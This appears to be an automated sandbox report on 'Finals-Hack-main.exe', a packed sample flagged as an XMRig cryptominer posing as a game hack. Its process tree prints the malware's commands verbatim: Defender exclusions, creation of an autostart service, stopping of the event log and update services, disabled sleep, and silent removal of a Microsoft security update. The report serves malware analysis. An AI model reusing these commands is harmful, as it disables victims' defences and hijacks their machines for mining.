Analysis

  • max time kernel
    1s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/01/2024, 12:29

General

  • Target

    Finals-Hack-main.exe

  • Size

    58.2MB

  • MD5

    00d14fa33fb1c9edd51ac7c47d2510f5

  • SHA1

    5adf21e21622a439e211749823b54c01d8358e49

  • SHA256

    b4b357887dfb39ceb3f3bf4c2c6e54839680a51befa3ef4e6b5ac5692b4d0df0

  • SHA512

    b03726dd3b52541e203448e858a12765df2dc1a57086e945c0bbb15ba73fd9e6cde9ad41e69442856617cc8890c0ae1955b7b71d8c5f7fc562426fe05ba9cf46

  • SSDEEP

    393216:u7SMdOjyyS2g0fxhOqy9goMLsADn0xIdunHm+:uFb2glA7L52nG+

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Stops running service(s) 3 TTPs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Program crash 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Finals-Hack-main.exe
    "C:\Users\Admin\AppData\Local\Temp\Finals-Hack-main.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get uuid
      2⤵
      PID:896
    • C:\Users\Admin\AppData\Roaming\driver3.exe
      C:\Users\Admin\AppData\Roaming\driver3.exe
      2⤵
      PID:356
    • C:\Users\Admin\AppData\Roaming\driver1.exe
      C:\Users\Admin\AppData\Roaming\driver1.exe
      2⤵
      PID:4028
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        3⤵
        PID:3508
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 444
          4⤵
          • Program crash
          PID:1624
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 448
          4⤵
          • Program crash
          PID:2400
    • C:\Users\Admin\AppData\Roaming\driver2.exe
      C:\Users\Admin\AppData\Roaming\driver2.exe
      2⤵
      PID:2984
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        PID:1432
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "XSVRRPDE"
        3⤵
        • Launches sc.exe
        PID:1596
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:3184
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "XSVRRPDE" binpath= "C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:4596
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "XSVRRPDE"
        3⤵
        • Launches sc.exe
        PID:424
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        PID:4064
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        PID:4728
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        PID:1348
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        PID:2260
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        3⤵
        • Launches sc.exe
        PID:2944
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        3⤵
        • Launches sc.exe
        PID:2740
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        3⤵
        • Launches sc.exe
        PID:2808
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:4612
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1872
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        PID:4616
  • C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe
    C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe
    1⤵
    PID:3676
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      PID:376
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:1652
    • C:\Windows\system32\svchost.exe
      svchost.exe
      2⤵
      PID:1512
    • C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
      2⤵
      PID:3296
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      PID:4524
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      PID:5064
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      PID:2320
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      PID:424
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:1088
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:2096
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2192
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:3580
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      PID:2400
  • C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    1⤵
    PID:1720
  • C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    1⤵
    PID:4340
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3508 -ip 3508
    1⤵
    PID:3020
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3508 -ip 3508
    1⤵
    PID:3476
  • C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    1⤵
    PID:2404

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/376-76-0x000001A308480000-0x000001A308490000-memory.dmp (Filesize 64KB)
  • memory/376-94-0x000001A321120000-0x000001A32113A000-memory.dmp (Filesize 104KB)
  • memory/376-95-0x000001A3210D0000-0x000001A3210D8000-memory.dmp (Filesize 32KB)
  • memory/376-98-0x000001A308480000-0x000001A308490000-memory.dmp (Filesize 64KB)
  • memory/376-101-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp (Filesize 10.8MB)
  • memory/376-97-0x000001A321110000-0x000001A32111A000-memory.dmp (Filesize 40KB)
  • memory/376-96-0x000001A321100000-0x000001A321106000-memory.dmp (Filesize 24KB)
  • memory/376-93-0x000001A3210C0000-0x000001A3210CA000-memory.dmp (Filesize 40KB)
  • memory/376-87-0x000001A320E90000-0x000001A320EAC000-memory.dmp (Filesize 112KB)
  • memory/376-92-0x000001A3210E0000-0x000001A3210FC000-memory.dmp (Filesize 112KB)
  • memory/376-89-0x000001A308480000-0x000001A308490000-memory.dmp (Filesize 64KB)
  • memory/376-91-0x000001A320F70000-0x000001A320F7A000-memory.dmp (Filesize 40KB)
  • memory/376-90-0x000001A320EB0000-0x000001A320F65000-memory.dmp (Filesize 724KB)
  • memory/376-88-0x00007FF456B80000-0x00007FF456B90000-memory.dmp (Filesize 64KB)
  • memory/376-75-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp (Filesize 10.8MB)
  • memory/376-77-0x000001A308480000-0x000001A308490000-memory.dmp (Filesize 64KB)
  • memory/1432-55-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp (Filesize 10.8MB)
  • memory/1432-52-0x0000025F19B10000-0x0000025F19B20000-memory.dmp (Filesize 64KB)
  • memory/1432-51-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp (Filesize 10.8MB)
  • memory/1432-53-0x0000025F19B10000-0x0000025F19B20000-memory.dmp (Filesize 64KB)
  • memory/1512-113-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-112-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-110-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-150-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-111-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-114-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-117-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-118-0x000001F2173B0000-0x000001F2173D0000-memory.dmp (Filesize 128KB)
  • memory/1512-120-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-116-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-119-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-121-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-123-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/1512-122-0x0000000140000000-0x0000000140848000-memory.dmp (Filesize 8.3MB)
  • memory/2404-142-0x00000000020B0000-0x00000000024B0000-memory.dmp (Filesize 4.0MB)
  • memory/2404-138-0x00000000020B0000-0x00000000024B0000-memory.dmp (Filesize 4.0MB)
  • memory/2404-139-0x00000000020B0000-0x00000000024B0000-memory.dmp (Filesize 4.0MB)
  • memory/2404-136-0x00000000004B0000-0x00000000004B9000-memory.dmp (Filesize 36KB)
  • memory/2404-143-0x0000000075AD0000-0x0000000075CE5000-memory.dmp (Filesize 2.1MB)
  • memory/2404-145-0x00000000020B0000-0x00000000024B0000-memory.dmp (Filesize 4.0MB)
  • memory/2404-140-0x00007FF8074D0000-0x00007FF8076C5000-memory.dmp (Filesize 2.0MB)
  • memory/2984-38-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp (Filesize 13.1MB)
  • memory/2984-37-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp (Filesize 13.1MB)
  • memory/2984-57-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp (Filesize 13.1MB)
  • memory/2984-36-0x00007FF8076D0000-0x00007FF8076D2000-memory.dmp (Filesize 8KB)
  • memory/3296-105-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3296-102-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3296-106-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3296-103-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3296-109-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3296-104-0x0000000140000000-0x000000014000E000-memory.dmp (Filesize 56KB)
  • memory/3508-135-0x0000000075AD0000-0x0000000075CE5000-memory.dmp (Filesize 2.1MB)
  • memory/3508-144-0x0000000003BF0000-0x0000000003FF0000-memory.dmp (Filesize 4.0MB)
  • memory/3508-128-0x0000000000C20000-0x0000000000CA8000-memory.dmp (Filesize 544KB)
  • memory/3508-127-0x0000000000C20000-0x0000000000CA8000-memory.dmp (Filesize 544KB)
  • memory/3508-124-0x0000000000C20000-0x0000000000CA8000-memory.dmp (Filesize 544KB)
  • memory/3508-129-0x0000000003BF0000-0x0000000003FF0000-memory.dmp (Filesize 4.0MB)
  • memory/3508-131-0x0000000003BF0000-0x0000000003FF0000-memory.dmp (Filesize 4.0MB)
  • memory/3508-132-0x00007FF8074D0000-0x00007FF8076C5000-memory.dmp (Filesize 2.0MB)
  • memory/3508-134-0x0000000003BF0000-0x0000000003FF0000-memory.dmp (Filesize 4.0MB)
  • memory/3508-130-0x0000000003BF0000-0x0000000003FF0000-memory.dmp (Filesize 4.0MB)
  • memory/3676-115-0x00007FF770A00000-0x00007FF771721000-memory.dmp (Filesize 13.1MB)
  • memory/3676-61-0x00007FF770A00000-0x00007FF771721000-memory.dmp (Filesize 13.1MB)
  • memory/3676-60-0x00007FF8076D0000-0x00007FF8076D2000-memory.dmp (Filesize 8KB)
  • memory/3676-62-0x00007FF770A00000-0x00007FF771721000-memory.dmp (Filesize 13.1MB)
  • memory/4028-125-0x00007FF782920000-0x00007FF782BDA000-memory.dmp (Filesize 2.7MB)
  • memory/4388-9-0x0000023C0FD60000-0x0000023C0FD82000-memory.dmp (Filesize 136KB)
  • memory/4388-10-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp (Filesize 10.8MB)
  • memory/4388-12-0x0000023C0DF80000-0x0000023C0DF90000-memory.dmp (Filesize 64KB)
  • memory/4388-11-0x0000023C0DF80000-0x0000023C0DF90000-memory.dmp (Filesize 64KB)
  • memory/4388-15-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp (Filesize 10.8MB)